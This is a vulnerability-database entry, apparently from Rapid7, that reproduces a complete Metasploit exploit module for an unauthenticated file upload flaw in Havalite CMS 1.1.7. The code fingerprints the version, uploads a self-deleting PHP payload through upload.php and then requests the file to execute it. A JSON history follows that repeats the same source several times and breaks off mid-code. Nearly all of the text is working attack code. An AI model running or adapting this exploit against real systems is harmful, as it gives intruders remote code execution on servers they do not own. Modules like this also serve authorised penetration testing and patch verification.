ID MSF:EXPLOIT/UNIX/WEBAPP/HAVALITE_UPLOAD_EXEC Type metasploit Reporter Rapid7 Modified 2017-09-08T01:18:50
Description
This module exploits a file upload vulnerability found in Havalite CMS 1.1.7, and possibly prior. Attackers can abuse the upload feature in order to upload a malicious PHP file without authentication, which results in arbitrary remote code execution.
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::PhpEXE
def initialize(info={})
super(update_info(info,
'Name' => "Havalite CMS Arbitary File Upload Vulnerability",
'Description' => %q{
This module exploits a file upload vulnerability found in Havalite CMS 1.1.7, and
possibly prior. Attackers can abuse the upload feature in order to upload a
malicious PHP file without authentication, which results in arbitrary remote code
execution.
},
'License' => MSF_LICENSE,
'Author' =>
[
'CWH',
'sinn3r' #Metasploit
],
'References' =>
[
['OSVDB', '94405'],
['EDB', '26243']
],
'Payload' =>
{
'BadChars' => "\x00"
},
'Platform' => %w{ linux php },
'Targets' =>
[
[ 'Generic (PHP Payload)', { 'Arch' => ARCH_PHP, 'Platform' => 'php' } ],
[ 'Linux x86' , { 'Arch' => ARCH_X86, 'Platform' => 'linux'} ]
],
'Privileged' => false,
'DisclosureDate' => "Jun 17 2013",
'DefaultTarget' => 0))
register_options(
[
OptString.new('TARGETURI', [true, 'The base path to havalite', '/'])
])
end
#
# Checks if target is running HavaLite CMS 1.1.7
# We only flag 1.1.7 as vulnerable, because we don't have enough information from
# the vendor or OSVDB about exactly which ones are really vulnerable.
#
def check
uri = normalize_uri(target_uri.path, 'havalite/')
res = send_request_raw({'uri' => uri})
if not res
vprint_error("Connection timed out")
return Exploit::CheckCode::Unknown
end
js_src = res.body.scan(/<script type="text\/javascript">(.+)<\/script>/im).flatten[0] || ''
version = js_src.scan(/var myVersion = '(.+)';/).flatten[0] || ''
if not version.empty? and version =~ /1\.1\.7/
vprint_status("Version found: #{version}")
return Exploit::CheckCode::Appears
end
Exploit::CheckCode::Safe
end
#
# Uploads our malicious file
#
def upload(base)
p = get_write_exec_payload(:unlink_self=>true)
fname = "#{rand_text_alpha(5)}.php"
data = Rex::MIME::Message.new
data.add_part(p, "application/octet-stream", nil, "form-data; name=\"files[]\"; filename=\"#{fname}\"")
post_data = data.to_s
res = send_request_cgi({
'method' => 'POST',
'uri' => normalize_uri(base, 'havalite', 'upload.php'),
'ctype' => "multipart/form-data; boundary=#{data.bound}",
'data' => post_data
})
if not res
fail_with(Failure::Unknown, "#{peer} - Request timed out while uploading")
elsif res.code.to_i == 404
fail_with(Failure::NotFound, "#{peer} - No upload.php found")
elsif res.body =~ /"error"\:"abort"/
fail_with(Failure::Unknown, "#{peer} - Unable to write #{fname}")
end
return fname
end
#
# Executes our uploaded malicious file
#
def exec(base, payload_fname)
res = send_request_raw({
'uri' => normalize_uri(base, 'havalite','tmp', 'files', payload_fname)
})
if res and res.code == 404
fail_with(Failure::NotFound, "#{peer} - Not found: #{payload_fname}")
end
end
def exploit
base = target_uri.path
print_status("Uploading malicious file...")
fname = upload(base)
print_status("Executing #{fname}...")
exec(base, fname)
end
end
{"id": "MSF:EXPLOIT/UNIX/WEBAPP/HAVALITE_UPLOAD_EXEC", "hash": "30559bcc32809ca21a6af9e4866fb960", "type": "metasploit", "bulletinFamily": "exploit", "title": "Havalite CMS Arbitary File Upload Vulnerability", "description": "This module exploits a file upload vulnerability found in Havalite CMS 1.1.7, and possibly prior. Attackers can abuse the upload feature in order to upload a malicious PHP file without authentication, which results in arbitrary remote code execution.\n", "published": "2013-06-19T00:00:42", "modified": "2017-09-08T01:18:50", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": [], "lastseen": "2019-11-10T23:28:06", "history": [{"bulletin": {"id": "MSF:EXPLOIT/UNIX/WEBAPP/HAVALITE_UPLOAD_EXEC", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "Havalite CMS Arbitary File Upload Vulnerability", "description": "This module exploits a file upload vulnerability found in Havalite CMS 1.1.7, and possibly prior. Attackers can abuse the upload feature in order to upload a malicious PHP file without authentication, which results in arbitary remote code execution.", "published": "2013-06-19T00:00:42", "modified": "2017-05-03T20:42:21", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "https://www.rapid7.com/db/modules/exploit/unix/webapp/havalite_upload_exec", "reporter": "Rapid7", "references": ["#", "http://www.exploit-db.com/exploits/26243/"], "cvelist": [], "lastseen": "2017-07-02T23:57:20", "history": [], "viewCount": 0, "enchantments": {}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/unix/webapp/havalite_upload_exec.rb", "sourceData": "##\n# This module requires Metasploit: http://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::HttpClient\n include Msf::Exploit::PhpEXE\n\n def initialize(info={})\n super(update_info(info,\n 'Name' => \"Havalite CMS Arbitary File Upload Vulnerability\",\n 'Description' => %q{\n This module exploits a file upload vulnerability found in Havalite CMS 1.1.7, and\n possibly prior. Attackers can abuse the upload feature in order to upload a\n malicious PHP file without authentication, which results in arbitary remote code\n execution.\n },\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'CWH',\n 'sinn3r' #Metasploit\n ],\n 'References' =>\n [\n ['OSVDB', '94405'],\n ['EDB', '26243']\n ],\n 'Payload' =>\n {\n 'BadChars' => \"\\x00\"\n },\n 'Platform' => %w{ linux php },\n 'Targets' =>\n [\n [ 'Generic (PHP Payload)', { 'Arch' => ARCH_PHP, 'Platform' => 'php' } ],\n [ 'Linux x86' , { 'Arch' => ARCH_X86, 'Platform' => 'linux'} ]\n ],\n 'Privileged' => false,\n 'DisclosureDate' => \"Jun 17 2013\",\n 'DefaultTarget' => 0))\n\n register_options(\n [\n OptString.new('TARGETURI', [true, 'The base path to havalite', '/'])\n ])\n end\n\n #\n # Checks if target is running HavaLite CMS 1.1.7\n # We only flag 1.1.7 as vulnerable, because we don't have enough information from\n # the vendor or OSVDB about exactly which ones are really vulnerable.\n #\n def check\n uri = normalize_uri(target_uri.path, 'havalite/')\n res = send_request_raw({'uri' => uri})\n\n if not res\n vprint_error(\"Connection timed out\")\n return Exploit::CheckCode::Unknown\n end\n\n js_src = res.body.scan(/<script type=\"text\\/javascript\">(.+)<\\/script>/im).flatten[0] || ''\n version = js_src.scan(/var myVersion = '(.+)';/).flatten[0] || ''\n\n if not version.empty? and version =~ /1\\.1\\.7/\n vprint_status(\"Version found: #{version}\")\n return Exploit::CheckCode::Appears\n end\n\n Exploit::CheckCode::Safe\n end\n\n\n #\n # Uploads our malicious file\n #\n def upload(base)\n p = get_write_exec_payload(:unlink_self=>true)\n fname = \"#{rand_text_alpha(5)}.php\"\n\n data = Rex::MIME::Message.new\n data.add_part(p, \"application/octet-stream\", nil, \"form-data; name=\\\"files[]\\\"; filename=\\\"#{fname}\\\"\")\n post_data = data.to_s\n\n res = send_request_cgi({\n 'method' => 'POST',\n 'uri' => normalize_uri(base, 'havalite', 'upload.php'),\n 'ctype' => \"multipart/form-data; boundary=#{data.bound}\",\n 'data' => post_data\n })\n\n if not res\n fail_with(Failure::Unknown, \"#{peer} - Request timed out while uploading\")\n elsif res.code.to_i == 404\n fail_with(Failure::NotFound, \"#{peer} - No upload.php found\")\n elsif res.body =~ /\"error\"\\:\"abort\"/\n fail_with(Failure::Unknown, \"#{peer} - Unable to write #{fname}\")\n end\n\n return fname\n end\n\n\n #\n # Executes our uploaded malicious file\n #\n def exec(base, payload_fname)\n res = send_request_raw({\n 'uri' => normalize_uri(base, 'havalite','tmp', 'files', payload_fname)\n })\n\n if res and res.code == 404\n fail_with(Failure::NotFound, \"#{peer} - Not found: #{payload_fname}\")\n end\n end\n\n\n def exploit\n base = target_uri.path\n\n print_status(\"Uploading malicious file...\")\n fname = upload(base)\n\n print_status(\"Executing #{fname}...\")\n exec(base, fname)\n end\nend\n", "metasploitReliability": "Excellent", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/exploits/unix/webapp/havalite_upload_exec.rb"}, "lastseen": "2017-07-02T23:57:20", "differentElements": ["modified", "sourceData"], "edition": 1}, {"bulletin": {"id": "MSF:EXPLOIT/UNIX/WEBAPP/HAVALITE_UPLOAD_EXEC", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "Havalite CMS Arbitary File Upload Vulnerability", "description": "This module exploits a file upload vulnerability found in Havalite CMS 1.1.7, and possibly prior. Attackers can abuse the upload feature in order to upload a malicious PHP file without authentication, which results in arbitary remote code execution.", "published": "2013-06-19T00:00:42", "modified": "2017-07-24T13:26:21", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "https://www.rapid7.com/db/modules/exploit/unix/webapp/havalite_upload_exec", "reporter": "Rapid7", "references": ["#", "http://www.exploit-db.com/exploits/26243/"], "cvelist": [], "lastseen": "2017-07-24T20:01:54", "history": [], "viewCount": 0, "enchantments": {}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/unix/webapp/havalite_upload_exec.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::HttpClient\n include Msf::Exploit::PhpEXE\n\n def initialize(info={})\n super(update_info(info,\n 'Name' => \"Havalite CMS Arbitary File Upload Vulnerability\",\n 'Description' => %q{\n This module exploits a file upload vulnerability found in Havalite CMS 1.1.7, and\n possibly prior. Attackers can abuse the upload feature in order to upload a\n malicious PHP file without authentication, which results in arbitary remote code\n execution.\n },\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'CWH',\n 'sinn3r' #Metasploit\n ],\n 'References' =>\n [\n ['OSVDB', '94405'],\n ['EDB', '26243']\n ],\n 'Payload' =>\n {\n 'BadChars' => \"\\x00\"\n },\n 'Platform' => %w{ linux php },\n 'Targets' =>\n [\n [ 'Generic (PHP Payload)', { 'Arch' => ARCH_PHP, 'Platform' => 'php' } ],\n [ 'Linux x86' , { 'Arch' => ARCH_X86, 'Platform' => 'linux'} ]\n ],\n 'Privileged' => false,\n 'DisclosureDate' => \"Jun 17 2013\",\n 'DefaultTarget' => 0))\n\n register_options(\n [\n OptString.new('TARGETURI', [true, 'The base path to havalite', '/'])\n ])\n end\n\n #\n # Checks if target is running HavaLite CMS 1.1.7\n # We only flag 1.1.7 as vulnerable, because we don't have enough information from\n # the vendor or OSVDB about exactly which ones are really vulnerable.\n #\n def check\n uri = normalize_uri(target_uri.path, 'havalite/')\n res = send_request_raw({'uri' => uri})\n\n if not res\n vprint_error(\"Connection timed out\")\n return Exploit::CheckCode::Unknown\n end\n\n js_src = res.body.scan(/<script type=\"text\\/javascript\">(.+)<\\/script>/im).flatten[0] || ''\n version = js_src.scan(/var myVersion = '(.+)';/).flatten[0] || ''\n\n if not version.empty? and version =~ /1\\.1\\.7/\n vprint_status(\"Version found: #{version}\")\n return Exploit::CheckCode::Appears\n end\n\n Exploit::CheckCode::Safe\n end\n\n\n #\n # Uploads our malicious file\n #\n def upload(base)\n p = get_write_exec_payload(:unlink_self=>true)\n fname = \"#{rand_text_alpha(5)}.php\"\n\n data = Rex::MIME::Message.new\n data.add_part(p, \"application/octet-stream\", nil, \"form-data; name=\\\"files[]\\\"; filename=\\\"#{fname}\\\"\")\n post_data = data.to_s\n\n res = send_request_cgi({\n 'method' => 'POST',\n 'uri' => normalize_uri(base, 'havalite', 'upload.php'),\n 'ctype' => \"multipart/form-data; boundary=#{data.bound}\",\n 'data' => post_data\n })\n\n if not res\n fail_with(Failure::Unknown, \"#{peer} - Request timed out while uploading\")\n elsif res.code.to_i == 404\n fail_with(Failure::NotFound, \"#{peer} - No upload.php found\")\n elsif res.body =~ /\"error\"\\:\"abort\"/\n fail_with(Failure::Unknown, \"#{peer} - Unable to write #{fname}\")\n end\n\n return fname\n end\n\n\n #\n # Executes our uploaded malicious file\n #\n def exec(base, payload_fname)\n res = send_request_raw({\n 'uri' => normalize_uri(base, 'havalite','tmp', 'files', payload_fname)\n })\n\n if res and res.code == 404\n fail_with(Failure::NotFound, \"#{peer} - Not found: #{payload_fname}\")\n end\n end\n\n\n def exploit\n base = target_uri.path\n\n print_status(\"Uploading malicious file...\")\n fname = upload(base)\n\n print_status(\"Executing #{fname}...\")\n exec(base, fname)\n end\nend\n", "metasploitReliability": "Excellent", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/exploits/unix/webapp/havalite_upload_exec.rb"}, "lastseen": "2017-07-24T20:01:54", "differentElements": ["href", "references"], "edition": 2}, {"bulletin": {"id": "MSF:EXPLOIT/UNIX/WEBAPP/HAVALITE_UPLOAD_EXEC", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "Havalite CMS Arbitary File Upload Vulnerability", "description": "This module exploits a file upload vulnerability found in Havalite CMS 1.1.7, and possibly prior. Attackers can abuse the upload feature in order to upload a malicious PHP file without authentication, which results in arbitary remote code execution.", "published": "2013-06-19T00:00:42", "modified": "2017-07-24T13:26:21", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": [], "lastseen": "2017-08-21T15:30:02", "history": [], "viewCount": 0, "enchantments": {}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/unix/webapp/havalite_upload_exec.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::HttpClient\n include Msf::Exploit::PhpEXE\n\n def initialize(info={})\n super(update_info(info,\n 'Name' => \"Havalite CMS Arbitary File Upload Vulnerability\",\n 'Description' => %q{\n This module exploits a file upload vulnerability found in Havalite CMS 1.1.7, and\n possibly prior. Attackers can abuse the upload feature in order to upload a\n malicious PHP file without authentication, which results in arbitary remote code\n execution.\n },\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'CWH',\n 'sinn3r' #Metasploit\n ],\n 'References' =>\n [\n ['OSVDB', '94405'],\n ['EDB', '26243']\n ],\n 'Payload' =>\n {\n 'BadChars' => \"\\x00\"\n },\n 'Platform' => %w{ linux php },\n 'Targets' =>\n [\n [ 'Generic (PHP Payload)', { 'Arch' => ARCH_PHP, 'Platform' => 'php' } ],\n [ 'Linux x86' , { 'Arch' => ARCH_X86, 'Platform' => 'linux'} ]\n ],\n 'Privileged' => false,\n 'DisclosureDate' => \"Jun 17 2013\",\n 'DefaultTarget' => 0))\n\n register_options(\n [\n OptString.new('TARGETURI', [true, 'The base path to havalite', '/'])\n ])\n end\n\n #\n # Checks if target is running HavaLite CMS 1.1.7\n # We only flag 1.1.7 as vulnerable, because we don't have enough information from\n # the vendor or OSVDB about exactly which ones are really vulnerable.\n #\n def check\n uri = normalize_uri(target_uri.path, 'havalite/')\n res = send_request_raw({'uri' => uri})\n\n if not res\n vprint_error(\"Connection timed out\")\n return Exploit::CheckCode::Unknown\n end\n\n js_src = res.body.scan(/<script type=\"text\\/javascript\">(.+)<\\/script>/im).flatten[0] || ''\n version = js_src.scan(/var myVersion = '(.+)';/).flatten[0] || ''\n\n if not version.empty? and version =~ /1\\.1\\.7/\n vprint_status(\"Version found: #{version}\")\n return Exploit::CheckCode::Appears\n end\n\n Exploit::CheckCode::Safe\n end\n\n\n #\n # Uploads our malicious file\n #\n def upload(base)\n p = get_write_exec_payload(:unlink_self=>true)\n fname = \"#{rand_text_alpha(5)}.php\"\n\n data = Rex::MIME::Message.new\n data.add_part(p, \"application/octet-stream\", nil, \"form-data; name=\\\"files[]\\\"; filename=\\\"#{fname}\\\"\")\n post_data = data.to_s\n\n res = send_request_cgi({\n 'method' => 'POST',\n 'uri' => normalize_uri(base, 'havalite', 'upload.php'),\n 'ctype' => \"multipart/form-data; boundary=#{data.bound}\",\n 'data' => post_data\n })\n\n if not res\n fail_with(Failure::Unknown, \"#{peer} - Request timed out while uploading\")\n elsif res.code.to_i == 404\n fail_with(Failure::NotFound, \"#{peer} - No upload.php found\")\n elsif res.body =~ /\"error\"\\:\"abort\"/\n fail_with(Failure::Unknown, \"#{peer} - Unable to write #{fname}\")\n end\n\n return fname\n end\n\n\n #\n # Executes our uploaded malicious file\n #\n def exec(base, payload_fname)\n res = send_request_raw({\n 'uri' => normalize_uri(base, 'havalite','tmp', 'files', payload_fname)\n })\n\n if res and res.code == 404\n fail_with(Failure::NotFound, \"#{peer} - Not found: #{payload_fname}\")\n end\n end\n\n\n def exploit\n base = target_uri.path\n\n print_status(\"Uploading malicious file...\")\n fname = upload(base)\n\n print_status(\"Executing #{fname}...\")\n exec(base, fname)\n end\nend\n", "metasploitReliability": "Excellent", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/exploits/unix/webapp/havalite_upload_exec.rb"}, "lastseen": "2017-08-21T15:30:02", "differentElements": ["description", "modified", "sourceData"], "edition": 3}, {"bulletin": {"id": "MSF:EXPLOIT/UNIX/WEBAPP/HAVALITE_UPLOAD_EXEC", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "Havalite CMS Arbitary File Upload Vulnerability", "description": "This module exploits a file upload vulnerability found in Havalite CMS 1.1.7, and possibly prior. Attackers can abuse the upload feature in order to upload a malicious PHP file without authentication, which results in arbitrary remote code execution.", "published": "2013-06-19T00:00:42", "modified": "2017-09-08T01:18:50", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": [], "lastseen": "2017-09-13T00:32:56", "history": [], "viewCount": 0, "enchantments": {}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/unix/webapp/havalite_upload_exec.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::HttpClient\n include Msf::Exploit::PhpEXE\n\n def initialize(info={})\n super(update_info(info,\n 'Name' => \"Havalite CMS Arbitary File Upload Vulnerability\",\n 'Description' => %q{\n This module exploits a file upload vulnerability found in Havalite CMS 1.1.7, and\n possibly prior. Attackers can abuse the upload feature in order to upload a\n malicious PHP file without authentication, which results in arbitrary remote code\n execution.\n },\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'CWH',\n 'sinn3r' #Metasploit\n ],\n 'References' =>\n [\n ['OSVDB', '94405'],\n ['EDB', '26243']\n ],\n 'Payload' =>\n {\n 'BadChars' => \"\\x00\"\n },\n 'Platform' => %w{ linux php },\n 'Targets' =>\n [\n [ 'Generic (PHP Payload)', { 'Arch' => ARCH_PHP, 'Platform' => 'php' } ],\n [ 'Linux x86' , { 'Arch' => ARCH_X86, 'Platform' => 'linux'} ]\n ],\n 'Privileged' => false,\n 'DisclosureDate' => \"Jun 17 2013\",\n 'DefaultTarget' => 0))\n\n register_options(\n [\n OptString.new('TARGETURI', [true, 'The base path to havalite', '/'])\n ])\n end\n\n #\n # Checks if target is running HavaLite CMS 1.1.7\n # We only flag 1.1.7 as vulnerable, because we don't have enough information from\n # the vendor or OSVDB about exactly which ones are really vulnerable.\n #\n def check\n uri = normalize_uri(target_uri.path, 'havalite/')\n res = send_request_raw({'uri' => uri})\n\n if not res\n vprint_error(\"Connection timed out\")\n return Exploit::CheckCode::Unknown\n end\n\n js_src = res.body.scan(/<script type=\"text\\/javascript\">(.+)<\\/script>/im).flatten[0] || ''\n version = js_src.scan(/var myVersion = '(.+)';/).flatten[0] || ''\n\n if not version.empty? and version =~ /1\\.1\\.7/\n vprint_status(\"Version found: #{version}\")\n return Exploit::CheckCode::Appears\n end\n\n Exploit::CheckCode::Safe\n end\n\n\n #\n # Uploads our malicious file\n #\n def upload(base)\n p = get_write_exec_payload(:unlink_self=>true)\n fname = \"#{rand_text_alpha(5)}.php\"\n\n data = Rex::MIME::Message.new\n data.add_part(p, \"application/octet-stream\", nil, \"form-data; name=\\\"files[]\\\"; filename=\\\"#{fname}\\\"\")\n post_data = data.to_s\n\n res = send_request_cgi({\n 'method' => 'POST',\n 'uri' => normalize_uri(base, 'havalite', 'upload.php'),\n 'ctype' => \"multipart/form-data; boundary=#{data.bound}\",\n 'data' => post_data\n })\n\n if not res\n fail_with(Failure::Unknown, \"#{peer} - Request timed out while uploading\")\n elsif res.code.to_i == 404\n fail_with(Failure::NotFound, \"#{peer} - No upload.php found\")\n elsif res.body =~ /\"error\"\\:\"abort\"/\n fail_with(Failure::Unknown, \"#{peer} - Unable to write #{fname}\")\n end\n\n return fname\n end\n\n\n #\n # Executes our uploaded malicious file\n #\n def exec(base, payload_fname)\n res = send_request_raw({\n 'uri' => normalize_uri(base, 'havalite','tmp', 'files', payload_fname)\n })\n\n if res and res.code == 404\n fail_with(Failure::NotFound, \"#{peer} - Not found: #{payload_fname}\")\n end\n end\n\n\n def exploit\n base = target_uri.path\n\n print_status(\"Uploading malicious file...\")\n fname = upload(base)\n\n print_status(\"Executing #{fname}...\")\n exec(base, fname)\n end\nend\n", "metasploitReliability": "Excellent", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/exploits/unix/webapp/havalite_upload_exec.rb"}, "lastseen": "2017-09-13T00:32:56", "differentElements": ["modified", "published"], "edition": 4}, {"bulletin": {"id": "MSF:EXPLOIT/UNIX/WEBAPP/HAVALITE_UPLOAD_EXEC", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "Havalite CMS Arbitary File Upload Vulnerability", "description": "This module exploits a file upload vulnerability found in Havalite CMS 1.1.7, and possibly prior. Attackers can abuse the upload feature in order to upload a malicious PHP file without authentication, which results in arbitrary remote code execution.", "published": "1976-01-01T00:00:00", "modified": "1976-01-01T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": [], "lastseen": "2017-10-18T06:17:56", "history": [], "viewCount": 0, "enchantments": {}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/unix/webapp/havalite_upload_exec.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::HttpClient\n include Msf::Exploit::PhpEXE\n\n def initialize(info={})\n super(update_info(info,\n 'Name' => \"Havalite CMS Arbitary File Upload Vulnerability\",\n 'Description' => %q{\n This module exploits a file upload vulnerability found in Havalite CMS 1.1.7, and\n possibly prior. Attackers can abuse the upload feature in order to upload a\n malicious PHP file without authentication, which results in arbitrary remote code\n execution.\n },\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'CWH',\n 'sinn3r' #Metasploit\n ],\n 'References' =>\n [\n ['OSVDB', '94405'],\n ['EDB', '26243']\n ],\n 'Payload' =>\n {\n 'BadChars' => \"\\x00\"\n },\n 'Platform' => %w{ linux php },\n 'Targets' =>\n [\n [ 'Generic (PHP Payload)', { 'Arch' => ARCH_PHP, 'Platform' => 'php' } ],\n [ 'Linux x86' , { 'Arch' => ARCH_X86, 'Platform' => 'linux'} ]\n ],\n 'Privileged' => false,\n 'DisclosureDate' => \"Jun 17 2013\",\n 'DefaultTarget' => 0))\n\n register_options(\n [\n OptString.new('TARGETURI', [true, 'The base path to havalite', '/'])\n ])\n end\n\n #\n # Checks if target is running HavaLite CMS 1.1.7\n # We only flag 1.1.7 as vulnerable, because we don't have enough information from\n # the vendor or OSVDB about exactly which ones are really vulnerable.\n #\n def check\n uri = normalize_uri(target_uri.path, 'havalite/')\n res = send_request_raw({'uri' => uri})\n\n if not res\n vprint_error(\"Connection timed out\")\n return Exploit::CheckCode::Unknown\n end\n\n js_src = res.body.scan(/<script type=\"text\\/javascript\">(.+)<\\/script>/im).flatten[0] || ''\n version = js_src.scan(/var myVersion = '(.+)';/).flatten[0] || ''\n\n if not version.empty? and version =~ /1\\.1\\.7/\n vprint_status(\"Version found: #{version}\")\n return Exploit::CheckCode::Appears\n end\n\n Exploit::CheckCode::Safe\n end\n\n\n #\n # Uploads our malicious file\n #\n def upload(base)\n p = get_write_exec_payload(:unlink_self=>true)\n fname = \"#{rand_text_alpha(5)}.php\"\n\n data = Rex::MIME::Message.new\n data.add_part(p, \"application/octet-stream\", nil, \"form-data; name=\\\"files[]\\\"; filename=\\\"#{fname}\\\"\")\n post_data = data.to_s\n\n res = send_request_cgi({\n 'method' => 'POST',\n 'uri' => normalize_uri(base, 'havalite', 'upload.php'),\n 'ctype' => \"multipart/form-data; boundary=#{data.bound}\",\n 'data' => post_data\n })\n\n if not res\n fail_with(Failure::Unknown, \"#{peer} - Request timed out while uploading\")\n elsif res.code.to_i == 404\n fail_with(Failure::NotFound, \"#{peer} - No upload.php found\")\n elsif res.body =~ /\"error\"\\:\"abort\"/\n fail_with(Failure::Unknown, \"#{peer} - Unable to write #{fname}\")\n end\n\n return fname\n end\n\n\n #\n # Executes our uploaded malicious file\n #\n def exec(base, payload_fname)\n res = send_request_raw({\n 'uri' => normalize_uri(base, 'havalite','tmp', 'files', payload_fname)\n })\n\n if res and res.code == 404\n fail_with(Failure::NotFound, \"#{peer} - Not found: #{payload_fname}\")\n end\n end\n\n\n def exploit\n base = target_uri.path\n\n print_status(\"Uploading malicious file...\")\n fname = upload(base)\n\n print_status(\"Executing #{fname}...\")\n exec(base, fname)\n end\nend\n", "metasploitReliability": "Excellent", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/exploits/unix/webapp/havalite_upload_exec.rb"}, "lastseen": "2017-10-18T06:17:56", "differentElements": ["modified", "published"], "edition": 5}, {"bulletin": {"id": "MSF:EXPLOIT/UNIX/WEBAPP/HAVALITE_UPLOAD_EXEC", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "Havalite CMS Arbitary File Upload Vulnerability", "description": "This module exploits a file upload vulnerability found in Havalite CMS 1.1.7, and possibly prior. Attackers can abuse the upload feature in order to upload a malicious PHP file without authentication, which results in arbitrary remote code execution.", "published": "2013-06-19T00:00:42", "modified": "2017-09-08T01:18:50", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": [], "lastseen": "2017-10-18T07:04:27", "history": [], "viewCount": 1, "enchantments": {"score": {"modified": "2017-10-18T07:04:27", "value": 6.0}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/unix/webapp/havalite_upload_exec.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::HttpClient\n include Msf::Exploit::PhpEXE\n\n def initialize(info={})\n super(update_info(info,\n 'Name' => \"Havalite CMS Arbitary File Upload Vulnerability\",\n 'Description' => %q{\n This module exploits a file upload vulnerability found in Havalite CMS 1.1.7, and\n possibly prior. Attackers can abuse the upload feature in order to upload a\n malicious PHP file without authentication, which results in arbitrary remote code\n execution.\n },\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'CWH',\n 'sinn3r' #Metasploit\n ],\n 'References' =>\n [\n ['OSVDB', '94405'],\n ['EDB', '26243']\n ],\n 'Payload' =>\n {\n 'BadChars' => \"\\x00\"\n },\n 'Platform' => %w{ linux php },\n 'Targets' =>\n [\n [ 'Generic (PHP Payload)', { 'Arch' => ARCH_PHP, 'Platform' => 'php' } ],\n [ 'Linux x86' , { 'Arch' => ARCH_X86, 'Platform' => 'linux'} ]\n ],\n 'Privileged' => false,\n 'DisclosureDate' => \"Jun 17 2013\",\n 'DefaultTarget' => 0))\n\n register_options(\n [\n OptString.new('TARGETURI', [true, 'The base path to havalite', '/'])\n ])\n end\n\n #\n # Checks if target is running HavaLite CMS 1.1.7\n # We only flag 1.1.7 as vulnerable, because we don't have enough information from\n # the vendor or OSVDB about exactly which ones are really vulnerable.\n #\n def check\n uri = normalize_uri(target_uri.path, 'havalite/')\n res = send_request_raw({'uri' => uri})\n\n if not res\n vprint_error(\"Connection timed out\")\n return Exploit::CheckCode::Unknown\n end\n\n js_src = res.body.scan(/<script type=\"text\\/javascript\">(.+)<\\/script>/im).flatten[0] || ''\n version = js_src.scan(/var myVersion = '(.+)';/).flatten[0] || ''\n\n if not version.empty? and version =~ /1\\.1\\.7/\n vprint_status(\"Version found: #{version}\")\n return Exploit::CheckCode::Appears\n end\n\n Exploit::CheckCode::Safe\n end\n\n\n #\n # Uploads our malicious file\n #\n def upload(base)\n p = get_write_exec_payload(:unlink_self=>true)\n fname = \"#{rand_text_alpha(5)}.php\"\n\n data = Rex::MIME::Message.new\n data.add_part(p, \"application/octet-stream\", nil, \"form-data; name=\\\"files[]\\\"; filename=\\\"#{fname}\\\"\")\n post_data = data.to_s\n\n res = send_request_cgi({\n 'method' => 'POST',\n 'uri' => normalize_uri(base, 'havalite', 'upload.php'),\n 'ctype' => \"multipart/form-data; boundary=#{data.bound}\",\n 'data' => post_data\n })\n\n if not res\n fail_with(Failure::Unknown, \"#{peer} - Request timed out while uploading\")\n elsif res.code.to_i == 404\n fail_with(Failure::NotFound, \"#{peer} - No upload.php found\")\n 